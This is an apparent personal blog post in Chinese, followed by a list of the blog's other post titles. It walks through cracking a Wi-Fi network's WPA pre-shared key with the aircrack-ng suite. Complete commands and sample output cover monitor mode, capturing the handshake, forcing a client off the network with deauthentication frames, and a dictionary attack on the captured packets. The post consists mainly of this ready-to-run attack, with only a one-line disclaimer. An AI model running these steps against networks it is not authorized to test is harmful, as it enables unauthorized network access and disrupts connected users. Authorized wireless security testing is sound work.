aircrack

0. 安装aircrack
1. 以monitor模式启动无线网卡设备
2. 启动airodump-ng来收集authentication handshake
3. 同时打开另一个窗口, 执行aireplay-ng使连接在你想要破解的AP上的客户端瞬间断开连接，触发重连
4. 执行aircrack-ng来破解pre-shared key

事先申明，以下方法仅作为个人参看，只适用于特定的系统特定网卡/驱动，欲知全面详细的教程，请自行google aircrack

以下的例子假设要破解的AP的channel为9

0. 安装aircrack

1. 以monitor模式启动无线网卡设备

执行：

$ sudo airmon-ng stop wlan0mon
$ sudo airmon-ng start wlan0 9

此时，系统输出：

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

如果需要退出monitor mode，则输入：

$ sudo airmon-ng stop wlan0mon

2. 启动airodump-ng来收集authentication handshake

执行：

$ airodump-ng [-c <channel>] [--bssid <AP MAC>] -w psk <interface>
# e.g. $ airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk wlan0mon
# e.g. $ airodump-ng -c 9 -w psk wlan0mon

其中：

-c 9: channel for the wireless network
–bssid 00:14:6C:7E:40:80: 想要破解的AP MAC address
-w psk: 输出文件的前缀，包含IVs
wlan0mon: 无线网卡接口名

3. 同时打开另一个窗口, 执行aireplay-ng使连接在你想要破解的AP上的客户端瞬间断开连接，触发重连

执行：

$ aireplay-ng -0 <times> -a <AP MAC>  -c <CLIENT MAC> <interface>
# e.g. $ aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon

其中：

-0: deauthentication
1: number of deauths to send
-a 00:14:6C:7E:40:80: MAC address of AP
-c 00:0F:B5:FD:FB:C2: MAC address of client you’re deauthing
wlan0mon: interface name

注意：在之前的窗口（2），只有当handshake在右上角显示才意味着包含加密密码的包已经获得。记得保持你的网卡channel和你要破解的AP的channel一致。

4. 执行aircrack-ng来破解pre-shared key

执行：

$ aircrack-ng -w <dict file> -b <AP MAC> <package name>
# e.g. $ aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

其中：

-w password.lst: File name of the dictionary file
psk*.cap: Name of group of files containing the captured packets.

*Posts*

Crypto-Cookbook.md

Terraform-in-the-browser.md

Manage-ThingsBoard-with-Terraform.md

Go-vs-Rust:-String.md

Go-JSON-Marshal/Unmarshal.md

Terraform-Provider-Contributor-Workspace-Setup.md

Bash:-tee-+-ssh.md

Edit-HCL-For-Terraform.md

Go---Embedded-Field.md

Rust---Package.md

Rust---Trait.md

Rust---`Option`-take.md

Go-AST-Tips.md

Ruby-Tips.md

git-submodule-tips.md

go1.13-错误处理.md

Terraform-Provider-Tips.md

minikube-设置-bootstrap-token.md

浅谈-Go-context.md

go-micro:-Tracing.md

docker-compose指定容器在主机上监听的ip.md

microservice-设计.md

golang-reflect.md

nats-简介.md

go-micro-源码解析---server-&-client.md

go-micro-防坑指南.md

golang-之-变量隐藏(shadowing).md

zookeeper-之-eznode-&&-watcher.md

Dart-之-异步.md

Dart-之-类型系统.md

cgroup笔记.md

leetcode难题笔记.md

kotlin读书笔记.md

Vim-自动补全Golang遇到的问题.md

C/C++目标文件运行段和debug段分离.md

Golang-sql库.md

crontab.md

postgresql学习笔记-(v9.6).md

mysql笔记.md

Golang-随笔.md

理一理Python包管理.md

Ansible-Playbook.md

Dockerfile：sshd-service.md

Dockerfile.md

Shell-Tips.md

UPnP-Server.md

《Fluent-Python》读书笔记.md

12个羽毛球中1个是次品.md

C++11-auto-&&-decltype.md

Computer-Network-读书笔记.md

Archlinux:-Make-laptop-as-AP.md

C++11-std::bind.md

C++11-thread,-mutex,-condition-variable.md

bit-count-algorithm.md

gmock.md

SoX-tips.md

部署flaskbb(ubuntu).md

Where-does-variables-of-.so-resides-in-memory?.md

PulseAudio.md

锁和信号.md

Wireshark-practices.md

Install-ArchLinux-on-thinkpad-t460p.md

GDB-Tips.md

Unit-Test(C++).md

位操作技巧.md

手动修改二进制文件.md

Linux-多线程环境下的Signal.md

todo.txt.md

进程的输入参数.md

aircrack.md

ALSA---PCM接口.md

上海市办理社保卡，医保卡，居住证.md

C++-输入和输出(I/O).md

C++-虚函数(virtual-function).md

sed-tips.md

C++-继承(inheritance).md

C++-组合(composition).md

C++:-操作符重载.md

IOS-update-with-low-space.md

Posts